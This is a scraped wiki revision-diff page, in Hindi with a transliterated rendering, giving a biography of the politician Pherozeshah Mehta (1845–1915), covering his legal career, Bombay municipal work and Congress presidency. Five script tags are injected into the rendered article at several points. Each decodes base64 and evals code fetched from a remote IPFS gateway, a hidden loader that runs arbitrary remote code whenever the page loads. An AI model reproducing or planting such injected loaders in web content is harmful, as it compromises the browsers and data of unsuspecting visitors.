Difference between revisions of "फिरोज़शाह मेहता"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(4 intermediate revisions by 4 users not shown)
Line 4: Line 4:
 
|पूरा नाम=फिरोज़शाह मेहता
 
|पूरा नाम=फिरोज़शाह मेहता
 
|अन्य नाम=
 
|अन्य नाम=
|जन्म=[[4 अगस्त]] 1845
+
|जन्म=[[4 अगस्त]], 1845
 
|जन्म भूमि=बॉम्बे (अब [[मुम्बई]])
 
|जन्म भूमि=बॉम्बे (अब [[मुम्बई]])
|मृत्यु=[[5 नवम्बर]] [[1915]]
+
|मृत्यु=[[5 नवम्बर]], [[1915]]
 
|मृत्यु स्थान=
 
|मृत्यु स्थान=
|अविभावक=
+
|अभिभावक=
 
|पति/पत्नी=
 
|पति/पत्नी=
 
|संतान=
 
|संतान=
 
|गुरु=
 
|गुरु=
|कर्म भूमि=
+
|कर्म भूमि=[[भारत]]
 
|कर्म-क्षेत्र= राजनेता, बैरिस्टर, सम्पादक
 
|कर्म-क्षेत्र= राजनेता, बैरिस्टर, सम्पादक
 
|मुख्य रचनाएँ=
 
|मुख्य रचनाएँ=
Line 21: Line 21:
 
|विद्यालय=
 
|विद्यालय=
 
|पुरस्कार-उपाधि=नाइट
 
|पुरस्कार-उपाधि=नाइट
|प्रसिद्धि=
+
|प्रसिद्धि=राजनेता
|विशेष योगदान=बंबई नगरपालिका के संविधान (चार्टर) के निर्माता तथा [[अंग्रेज़ी भाषा]] के अखबार बॉम्बे क्रॉनिकल के संस्थापक
+
|विशेष योगदान=बंबई नगरपालिका के संविधान (चार्टर) के निर्माता तथा [[अंग्रेज़ी भाषा]] के [[अखबार]] बॉम्बे क्रॉनिकल के संस्थापक
 
|नागरिकता=भारतीय
 
|नागरिकता=भारतीय
 
|संबंधित लेख=
 
|संबंधित लेख=
Line 39: Line 39:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''फिरोज़शाह मेहता''' ([[अंग्रेज़ी]]: ''Pherozeshah Mehta'', जन्म- [[4 अगस्त]] 1845; मृत्यु- [[5 नवम्बर]] [[1915]]) भारतीय राजनेता, बंबई नगरपालिका के संविधान (चार्टर) के निर्माता तथा [[अंग्रेज़ी भाषा]] के अखबार' बॉम्बे क्रॉनिकल' के संस्थापक ([[1913]]) थे। [[1904]] में उन्हें 'नाइट' की उपाधि से विभूषित किया गया।  
+
'''फिरोज़शाह मेहता''' ([[अंग्रेज़ी]]: ''Pherozeshah Mehta'', जन्म- [[4 अगस्त]], 1845; मृत्यु- [[5 नवम्बर]], [[1915]]) भारतीय राजनेता, बंबई नगरपालिका के संविधान (चार्टर) के निर्माता तथा [[अंग्रेज़ी भाषा]] के अखबार' बॉम्बे क्रॉनिकल' के संस्थापक ([[1913]]) थे। [[1904]] में उन्हें 'नाइट' की उपाधि से विभूषित किया गया।
 
==जीवन परिचय==
 
==जीवन परिचय==
अपने समय के प्रसिद्ध भारतीय नेता और स्पष्ट वक्ता फिरोज़शाह मेहता का जन्म 4 अगस्त, 1845 ई. को [[मुम्बई]] के एक प्रसिद्ध व्यवसायी [[परिवार]] में हुआ था। आपने [[भारत]] में उच्च शिक्षा प्राप्त की थी। [[पारसी धर्म|पारसी]] समाज में एम. ए. पास करने वाले फिरोज़शाह मेहता पहले युवक थे। फ़िरोज़शाह ने चार [[वर्ष]] तक [[इंग्लैड]] में क़ानून का अध्ययन किया तथा [[1868]] में वहीं से वकालत (बैरिस्टर) की परीक्षा उत्तीर्ण कर भारत लौटे। मुम्बई के कमिश्नर आर्थर क्रॉफ़र्ड का एक क़ानूनी मामले में बचाव करते हुए उन्होंने स्थानीय शासन के सुधार की आवश्यकता महसूस की और [[1872]] के 'नगरपालिका अधिनियम' की रूपरेखा तैयार की, जिसके कारण वह 'बंबई स्थानीय शासन के जनक' कहलाए। [[1873]] में वह इसके आयुक्त नियुक्त हुए और [[1884]]-[[1885|85]] तथा [[1905]] में अध्यक्ष के रूप में भी कार्य किया। [[1886]] से बंबई विधान परिषद के सदस्य रहते हुए वह [[1893]] में [[गवर्नर-जनरल]] की सर्वोच्च विधान परिषद के लिए चुने गए। [[1890]] में उन्होंने [[भारतीय राष्ट्रीय कांग्रेस]] के छठे अधिवेशन की अध्यक्षता की। [[1910]] में इंग्लैंड की संक्षिप्त यात्रा के पश्चात वह [[बंबई विश्वविद्यालय]] के कुलपति नियुक्त हुए। [[1911]] में उन्होंने उस [[सेंट्रल बैंक ऑफ़ इंडिया]] की स्थापना में योगदान किया, जो भारतीयों द्वारा वित्त पोषित तथा नियंत्रित था।
+
अपने समय के प्रसिद्ध भारतीय नेता और स्पष्ट वक्ता फिरोज़शाह मेहता का जन्म 4 अगस्त, 1845 ई. को [[मुम्बई]] के एक प्रसिद्ध व्यवसायी [[परिवार]] में हुआ था। आपने [[भारत]] में उच्च शिक्षा प्राप्त की थी। [[पारसी धर्म|पारसी]] समाज में एम. ए. पास करने वाले फिरोज़शाह मेहता पहले युवक थे। फ़िरोज़शाह ने चार [[वर्ष]] तक [[इंग्लैड]] में क़ानून का अध्ययन किया तथा [[1868]] में वहीं से वकालत (बैरिस्टर) की परीक्षा उत्तीर्ण कर भारत लौटे। मुम्बई के कमिश्नर आर्थर क्रॉफ़र्ड का एक क़ानूनी मामले में बचाव करते हुए उन्होंने स्थानीय शासन के सुधार की आवश्यकता महसूस की और [[1872]] के 'नगरपालिका अधिनियम' की रूपरेखा तैयार की, जिसके कारण वह 'बंबई स्थानीय शासन के जनक' कहलाए। [[1873]] में वह इसके आयुक्त नियुक्त हुए और [[1884]]-[[1885|85]] तथा [[1905]] में अध्यक्ष के रूप में भी कार्य किया। [[1886]] से बंबई विधान परिषद के सदस्य रहते हुए वह [[1893]] में [[गवर्नर-जनरल]] की सर्वोच्च विधान परिषद के लिए चुने गए। [[1890]] में उन्होंने [[भारतीय राष्ट्रीय कांग्रेस]] के छठे अधिवेशन की अध्यक्षता की। [[1910]] में इंग्लैंड की संक्षिप्त यात्रा के पश्चात् वह [[बंबई विश्वविद्यालय]] के कुलपति नियुक्त हुए। [[1911]] में उन्होंने उस [[सेंट्रल बैंक ऑफ़ इंडिया]] की स्थापना में योगदान किया, जो भारतीयों द्वारा वित्त पोषित तथा नियंत्रित था।
 
==कार्यक्षेत्र==
 
==कार्यक्षेत्र==
फिरोज़शाह मेहता बैरिस्टरी की शिक्षा प्राप्त करने के लिए इंग्लैण्ड गए। वहाँ उनका [[दादाभाई नौरोजी]] से भी सम्पर्क हुआ। वे वहाँ भारत के पक्ष में आवाज़ उठाने वाली संस्थाओं से भी जुड़े रहे। भारत आकर उन्होंने वकालत आरम्भ की और शीघ्र ही उनकी गणना सफल बैरिस्टरों में होने लगी। उन्होंने 'मुम्बई म्युनिसिपल बोर्ड' के कार्यों में गहरी रुचि ली। उनका नगर में इतना प्रभाव था कि उन्हें ‘मुम्बई का मुकुटहीन राजा’ कहा जाता था। फिरोज़शाह मेहता [[1886]] में 'मुम्बई लेजिस्लेटिव कॉंसिल' के लिए मनोनीत किए गए। बाद में केन्द्र की 'इंपीरियल कॉंसिल' के भी सदस्य रहे।
+
फिरोज़शाह मेहता बैरिस्टरी की शिक्षा प्राप्त करने के लिए इंग्लैण्ड गए। वहाँ उनका [[दादाभाई नौरोजी]] से भी सम्पर्क हुआ। वे वहाँ [[भारत]] के पक्ष में आवाज़ उठाने वाली संस्थाओं से भी जुड़े रहे। भारत आकर उन्होंने वकालत आरम्भ की और शीघ्र ही उनकी गणना सफल बैरिस्टरों में होने लगी। उन्होंने 'मुम्बई म्युनिसिपल बोर्ड' के कार्यों में गहरी रुचि ली। उनका नगर में इतना प्रभाव था कि उन्हें ‘मुम्बई का मुकुटहीन राजा’ कहा जाता था। फिरोज़शाह मेहता [[1886]] में 'मुम्बई लेजिस्लेटिव कॉंसिल' के लिए मनोनीत किए गए। बाद में केन्द्र की 'इंपीरियल कॉंसिल' के भी सदस्य रहे।
 
====अंग्रेज़ों के प्रशंसक====
 
====अंग्रेज़ों के प्रशंसक====
[[कांग्रेस]] से उनका सम्बन्ध उसकी स्थापना के समय ही हो गया था। उस समय के अनेक नेताओं की भाँति फिरोज़शाह मेहता भी नरम विचारों के राजनीतिज्ञ थे। वे [[अंग्रेज़|अंग्रेज़ों]] के प्रशंसक थे। [[1890]] ई. में उन्होंने [[कांग्रेस]] के [[कोलकाता]] अधिवेशन की अध्यक्षता की। इस अवसर पर उन्होंने अपने भाषण में कहा था कि, ‘यदि आप अंग्रेज़ों के सामाजिक, नैतिक, मानसिक और राजनीतिक गुणों को अपनायेंगे तो [[भारत]] और ब्रिटेन के बीच सदा अच्छा सम्बन्ध रहेगा।’ [[1904]] की मुम्बई कांग्रेस के स्वागताध्यक्ष के रूप में भाषण करते हुए उन्होंने कहा कि, ‘मैंने दुनिया को नहीं बनाया, जिसने इसे बनाया है, वह स्वयं इसे सम्भालेगा। इसीलिए मैं तो अंग्रेज़ी राज को ईश्वर की देन मानता हूँ।’
+
[[कांग्रेस]] से उनका सम्बन्ध उसकी स्थापना के समय ही हो गया था। उस समय के अनेक नेताओं की भाँति फिरोज़शाह मेहता भी नरम विचारों के राजनीतिज्ञ थे। वे [[अंग्रेज़|अंग्रेज़ों]] के प्रशंसक थे। [[1890]] ई. में उन्होंने [[कांग्रेस]] के [[कांग्रेस अधिवेशन कलकत्ता|कोलकाता अधिवेशन]] की अध्यक्षता की। इस अवसर पर उन्होंने अपने भाषण में कहा था कि, "यदि आप अंग्रेज़ों के सामाजिक, नैतिक, मानसिक और राजनीतिक गुणों को अपनायेंगे तो [[भारत]] और [[ब्रिटेन]] के बीच सदा अच्छा सम्बन्ध रहेगा।" [[1904]] की मुम्बई कांग्रेस के स्वागताध्यक्ष के रूप में भाषण करते हुए उन्होंने कहा कि, "मैंने दुनिया को नहीं बनाया, जिसने इसे बनाया है, वह स्वयं इसे सम्भालेगा। इसीलिए मैं तो अंग्रेज़ी राज को ईश्वर की देन मानता हूँ।"
 
[[चित्र:Pherozeshah-Mehta-stamp.jpg|thumb|left|फिरोज़शाह मेहता के सम्मान में जारी [[डाक टिकट]]]]
 
[[चित्र:Pherozeshah-Mehta-stamp.jpg|thumb|left|फिरोज़शाह मेहता के सम्मान में जारी [[डाक टिकट]]]]
 
====शिक्षा के पक्षधर====
 
====शिक्षा के पक्षधर====
फिरोज़शाह मेहता शिक्षा पर बहुत ज़ोर देते थे। नौकरशाही को जनता की माँ-बाप समझने की प्रवृत्ति का उन्होंने सदा विरोध किया। वे अपने समय के उन थोड़े से नेताओं में से थे, जिनका जनता और अंग्रेज़ सरकार दोनों सम्मान करते थे। समय-समय पर वे सरकार से भिड़ भी जाते थे। अपने जीवन के अन्तिम दिनों में फिरोज़शाह मेहता ने [[अंग्रेज़ी]] दैनिक पत्र ‘बॉम्बे क्रॉनिकल’ का प्रकाशन आरम्भ किया। बाद में इस पत्र का देश के [[भारतीय राष्ट्रीय आन्दोलन|स्वतंत्रता संग्राम]] में बड़ा योगदान रहा।
+
फिरोज़शाह मेहता शिक्षा पर बहुत ज़ोर देते थे। नौकरशाही को जनता की माँ-बाप समझने की प्रवृत्ति का उन्होंने सदा विरोध किया। वे अपने समय के उन थोड़े से नेताओं में से थे, जिनका जनता और [[अंग्रेज़]] सरकार दोनों सम्मान करते थे। समय-समय पर वे सरकार से भिड़ भी जाते थे। अपने जीवन के अन्तिम दिनों में फिरोज़शाह मेहता ने [[अंग्रेज़ी]] दैनिक पत्र ‘बॉम्बे क्रॉनिकल’ का प्रकाशन आरम्भ किया। बाद में इस पत्र का देश के [[भारतीय राष्ट्रीय आन्दोलन|स्वतंत्रता संग्राम]] में बड़ा योगदान रहा।
 
==निधन==
 
==निधन==
 
[[5 नवम्बर]], [[1915]] ई. को फिरोज़शाह मेहता का निधन हो गया।
 
[[5 नवम्बर]], [[1915]] ई. को फिरोज़शाह मेहता का निधन हो गया।
Line 60: Line 60:
 
*[http://www.indianpost.com/viewstamp.php/Color/Blue%20Gray/SIR%20FEROZ%20SHAH%20MEHTA SIR FEROZ SHAH MEHTA postage stamp]
 
*[http://www.indianpost.com/viewstamp.php/Color/Blue%20Gray/SIR%20FEROZ%20SHAH%20MEHTA SIR FEROZ SHAH MEHTA postage stamp]
 
==संबंधित लेख==
 
==संबंधित लेख==
{{भारतीय राष्ट्रीय काँग्रेस के अध्यक्ष}}
+
{{स्वतन्त्रता सेनानी}}{{भारतीय राष्ट्रीय काँग्रेस के अध्यक्ष}}
 
[[Category:राजनीतिज्ञ]]
 
[[Category:राजनीतिज्ञ]]
 
[[Category:राजनेता]]
 
[[Category:राजनेता]]
 
[[Category:राजनीति कोश]]
 
[[Category:राजनीति कोश]]
 
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]]
 
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]]
[[Category:भारतीय राष्ट्रीय काँग्रेस अध्यक्ष]]
+
[[Category:भारतीय राष्ट्रीय काँग्रेस अध्यक्ष]][[Category:स्वतन्त्रता सेनानी]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 06:06, 5 November 2017

phirozashah mehata
poora nam phirozashah mehata
janm 4 agast, 1845
janm bhoomi b aaumbe (ab mumbee)
mrityu 5 navambar, 1915
karm bhoomi bharat
karm-kshetr rajaneta, bairistar, sampadak
bhasha hiandi, aangrezi
shiksha em. e., vakalat
puraskar-upadhi nait
prasiddhi rajaneta
vishesh yogadan banbee nagarapalika ke sanvidhan (chartar) ke nirmata tatha aangrezi bhasha ke akhabar b aaumbe kr aaunikal ke sansthapak
nagarikata bharatiy
any janakari apane jivan ke antim dinoan mean phirozashah mehata ne aangrezi dainik patr ‘b aaumbe kr aaunikal’ ka prakashan arambh kiya. bad mean is patr ka desh ke svatantrata sangram mean b da yogadan raha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

phirozashah mehata (aangrezi: Pherozeshah Mehta, janm- 4 agast, 1845; mrityu- 5 navambar, 1915) bharatiy rajaneta, banbee nagarapalika ke sanvidhan (chartar) ke nirmata tatha aangrezi bhasha ke akhabar' b aaumbe kr aaunikal' ke sansthapak (1913) the. 1904 mean unhean 'nait' ki upadhi se vibhooshit kiya gaya.

jivan parichay

apane samay ke prasiddh bharatiy neta aur spasht vakta phirozashah mehata ka janm 4 agast, 1845 ee. ko mumbee ke ek prasiddh vyavasayi parivar mean hua tha. apane bharat mean uchch shiksha prapt ki thi. parasi samaj mean em. e. pas karane vale phirozashah mehata pahale yuvak the. firozashah ne char varsh tak ianglaid mean qanoon ka adhyayan kiya tatha 1868 mean vahian se vakalat (bairistar) ki pariksha uttirn kar bharat laute. mumbee ke kamishnar arthar kr aaufard ka ek qanooni mamale mean bachav karate hue unhoanne sthaniy shasan ke sudhar ki avashyakata mahasoos ki aur 1872 ke 'nagarapalika adhiniyam' ki rooparekha taiyar ki, jisake karan vah 'banbee sthaniy shasan ke janak' kahalae. 1873 mean vah isake ayukt niyukt hue aur 1884-85 tatha 1905 mean adhyaksh ke roop mean bhi kary kiya. 1886 se banbee vidhan parishad ke sadasy rahate hue vah 1893 mean gavarnar-janaral ki sarvochch vidhan parishad ke lie chune ge. 1890 mean unhoanne bharatiy rashtriy kaangres ke chhathe adhiveshan ki adhyakshata ki. 1910 mean ianglaiand ki sankshipt yatra ke pashchath vah banbee vishvavidyalay ke kulapati niyukt hue. 1911 mean unhoanne us seantral baiank aauf iandiya ki sthapana mean yogadan kiya, jo bharatiyoan dvara vitt poshit tatha niyantrit tha.

karyakshetr

phirozashah mehata bairistari ki shiksha prapt karane ke lie ianglaind ge. vahaan unaka dadabhaee nauroji se bhi sampark hua. ve vahaan bharat ke paksh mean avaz uthane vali sansthaoan se bhi ju de rahe. bharat akar unhoanne vakalat arambh ki aur shighr hi unaki ganana saphal bairistaroan mean hone lagi. unhoanne 'mumbee myunisipal bord' ke karyoan mean gahari ruchi li. unaka nagar mean itana prabhav tha ki unhean ‘mumbee ka mukutahin raja’ kaha jata tha. phirozashah mehata 1886 mean 'mumbee lejisletiv k aauansil' ke lie manonit kie ge. bad mean kendr ki 'ianpiriyal k aauansil' ke bhi sadasy rahe.

aangrezoan ke prashansak

kaangres se unaka sambandh usaki sthapana ke samay hi ho gaya tha. us samay ke anek netaoan ki bhaanti phirozashah mehata bhi naram vicharoan ke rajanitijn the. ve aangrezoan ke prashansak the. 1890 ee. mean unhoanne kaangres ke kolakata adhiveshan ki adhyakshata ki. is avasar par unhoanne apane bhashan mean kaha tha ki, "yadi ap aangrezoan ke samajik, naitik, manasik aur rajanitik gunoan ko apanayeange to bharat aur briten ke bich sada achchha sambandh rahega." 1904 ki mumbee kaangres ke svagatadhyaksh ke roop mean bhashan karate hue unhoanne kaha ki, "maianne duniya ko nahian banaya, jisane ise banaya hai, vah svayan ise sambhalega. isilie maian to aangrezi raj ko eeshvar ki den manata hooan." [[chitr:Pherozeshah-Mehta-stamp.jpg|thumb|left|phirozashah mehata ke samman mean jari dak tikat]]

shiksha ke pakshadhar

phirozashah mehata shiksha par bahut zor dete the. naukarashahi ko janata ki maan-bap samajhane ki pravritti ka unhoanne sada virodh kiya. ve apane samay ke un tho de se netaoan mean se the, jinaka janata aur aangrez sarakar donoan samman karate the. samay-samay par ve sarakar se bhi d bhi jate the. apane jivan ke antim dinoan mean phirozashah mehata ne aangrezi dainik patr ‘b aaumbe kr aaunikal’ ka prakashan arambh kiya. bad mean is patr ka desh ke svatantrata sangram mean b da yogadan raha.

nidhan

5 navambar, 1915 ee. ko phirozashah mehata ka nidhan ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sharma, liladhar bharatiy charit kosh (hindi). bharat diskavari pustakalay: shiksha bharati, dilli, prishth 501.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>